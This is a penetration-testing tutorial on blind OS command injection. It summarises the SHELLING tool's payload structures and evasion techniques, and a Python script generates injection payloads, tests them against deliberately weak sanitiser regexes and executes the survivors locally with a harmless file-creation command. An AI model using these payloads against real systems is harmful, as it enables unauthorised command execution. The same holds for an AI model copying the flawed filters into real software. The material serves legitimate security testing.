Shell Injection Payloads

Wherever user input is believed to reach an operating-system command, there is a chance of breaking out of that command and achieving arbitrary command execution. The tool and payloads below can be used for blind shell injection testing. Combined with a DNS/web log platform and its API, the result of execution can be retrieved quickly even when the application returns nothing.

Tool URL

https://github.com/ewilded/shelling

The tool is described as follows

SHELLING – an offensive approach to the anatomy of improperly written OS command injection sanitisers

In order to improve the accuracy of our blind OS command injection testing, we need a comprehensive, analytic approach. In general, an injection payload can fail because of:
– the actual syntax of the expression we are injecting into (solution: base payload variants)
– input sanitising mechanisms, which reject forbidden characters (solution: evasive techniques)
– platform-specific conditions (e.g. using a Windows command on a *nix host)
– a bad callback method (e.g. asynchronous execution, no outbound traffic, etc.; solution: base payload variants)

BASE PAYLOAD VARIANTS (BASIC CASES)

  • MALICIOUS_COMMAND (will this ever happen? yes it will, in argument injections like $USER_SUPPLIED or $(USER_SUPPLIED), where the input itself is evaluated as a command)
  • MALICIOUS_COMMAND+COMMAND_TERMINATOR (for cases where the rest of the fixed expression must be neutralised, e.g. commented out, and command separators are not allowed)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND (for simple injections with no filtering, like cat $USER_SUPPLIED)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR (for simple injections with no filtering and appended fixed text, like cat $USER_SUPPLIED something)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX (for simple injections like cat $USER_SUPPLIED something, with filtering like \w+$)
  • PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR (for injections with lax filtering like ^\w+ and some appended fixed text, like cat $USER_SUPPLIED something)
  • PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX (for injections with appended fixed text, like cat $USER_SUPPLIED something, with lax filtering like ^\w+\s+.*\w+$)
  • PREFIX+MALICIOUS_COMMAND+SUFFIX (for the ` and $() command-substitution notations)

EVASIVE TECHNIQUES USED
– alternative COMMAND_SEPARATORS
– alternative ARGUMENT_SEPARATORS
– alternative COMMAND_TERMINATORS
– additional prefixes and suffixes to go around lax filters
– additional prefixes and suffixes to fit into quoted expressions

Other evasive techniques considered:
– alternative payloads to avoid particular bad characters
– encoding-related variations, like double URL encoding
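The following is an added worked example, not code from the SHELLING project: it builds the base payload variants listed above from the README's building blocks (prefix, command separator, argument separator, terminator, suffix), runs each one through a few deliberately weak sanitisers of the kind the README describes, and then inserts the survivors into the README's own vulnerable template `cat $USER_SUPPLIED something` and executes it with /bin/sh. The "malicious command" is a harmless `touch` of a per-payload file in a temporary directory, standing in for the DNS/web-log callback; the sanitiser regexes and the separator lists are assumptions chosen for illustration.

```python
"""SHELLING-style payload generation and sanitiser testing (added example).
Assumes a Bourne-compatible /bin/sh; nothing here contacts the network."""
import os
import re
import subprocess
import tempfile

# Building blocks named in the SHELLING README (illustrative values, not the tool's lists).
COMMAND_SEPARATORS = [";", "|", "||", "&&", "&", "\n"]
ARGUMENT_SEPARATORS = ["", " ", "${IFS}"]  # "" = prefix glued straight to the separator
COMMAND_TERMINATOR = " #"                   # comments out appended fixed text in sh
PREFIX_WORD, SUFFIX_WORD = "a", "b"         # satisfy \w+ in lax whitelist filters


def base_variants(cmd, sep, prefix, suffix, term=COMMAND_TERMINATOR):
    """The base payload structures from the README, keyed by structure name.
    The last README entry (backtick and $() notations) is split in two."""
    return {
        "CMD": cmd,
        "CMD+TERM": f"{cmd}{term}",
        "SEP+CMD": f"{sep}{cmd}",
        "SEP+CMD+SEP": f"{sep}{cmd}{sep}",
        "SEP+CMD+SEP+SUFFIX": f"{sep}{cmd}{sep}{suffix}",
        "PREFIX+SEP+CMD+SEP": f"{prefix}{sep}{cmd}{sep}",
        "PREFIX+SEP+CMD+SEP+SUFFIX": f"{prefix}{sep}{cmd}{sep}{suffix}",
        "PREFIX+`CMD`+SUFFIX": f"{prefix}`{cmd}`{suffix}",
        "PREFIX+$(CMD)+SUFFIX": f"{prefix}$({cmd}){suffix}",
    }


def all_payloads(cmd):
    """Every distinct (structure, payload) pair across the evasive alternatives."""
    out = []
    for sep in COMMAND_SEPARATORS:
        for argsep in ARGUMENT_SEPARATORS:
            for name, p in base_variants(cmd, sep, PREFIX_WORD + argsep, SUFFIX_WORD).items():
                if (name, p) not in out:
                    out.append((name, p))
    return out


# Constructed sanitisers of the "improperly written" kind; each returns True to accept input.
SANITISERS = {
    "allow_all": lambda s: True,
    "strict_word": lambda s: re.fullmatch(r"\w+", s) is not None,           # ^\w+$
    "lax_words": lambda s: re.fullmatch(r"\w+\s+.*\w+", s) is not None,     # ^\w+\s+.*\w+$ from the README
    "deny_semicolon_pipe": lambda s: re.search(r"[;|]", s) is None,        # blocklist: misses &, && and newline
}


def run_template(template, payload, callback_file):
    """Insert the payload into the vulnerable template and run it with /bin/sh.
    True if the out-of-band callback fired (a file was created, standing in for a
    DNS/HTTP log hit), False otherwise, None if no shell is available."""
    if os.path.exists(callback_file):
        os.remove(callback_file)
    command = template.replace("$USER_SUPPLIED", payload)
    try:
        subprocess.run(["/bin/sh", "-c", command], stdin=subprocess.DEVNULL,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5)
    except FileNotFoundError:
        return None
    except subprocess.TimeoutExpired:
        pass
    return os.path.exists(callback_file)


def survivors(sanitiser, template, workdir):
    """(structure, payload) pairs the sanitiser accepts that also fired the callback.
    Payloads are returned with the CALLBACK placeholder so results are comparable."""
    hits = []
    for i, (name, p) in enumerate(all_payloads("touch CALLBACK")):
        real = p.replace("CALLBACK", os.path.join(workdir, f"hit{i}"))  # unique file per payload
        if sanitiser(real) and run_template(template, real, os.path.join(workdir, f"hit{i}")):
            hits.append((name, p))
    return hits


def demo(template="cat $USER_SUPPLIED something"):
    """Run every sanitiser against the template; returns {sanitiser_name: survivors}."""
    with tempfile.TemporaryDirectory() as workdir:
        return {name: survivors(fn, template, workdir) for name, fn in SANITISERS.items()}


if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name}: {len(hits)} payload(s) executed")
        for structure, payload in hits[:3]:
            print("   ", structure, repr(payload))
```

Two things the run makes visible that the list above only states: the `^\w+\s+.*\w+$` filter is satisfied by a prefix that carries an argument separator (`a ;touch …;b`, `a $(touch …)b`), and a `&&` separator after a fixed command that fails (`cat a && …`) never reaches the injected command, so separator choice depends on the exit status of what precedes it, not only on the filter. Payloads using `&` run in the background, so a synchronous file check can miss them; a real DNS/web-log callback does not have that problem.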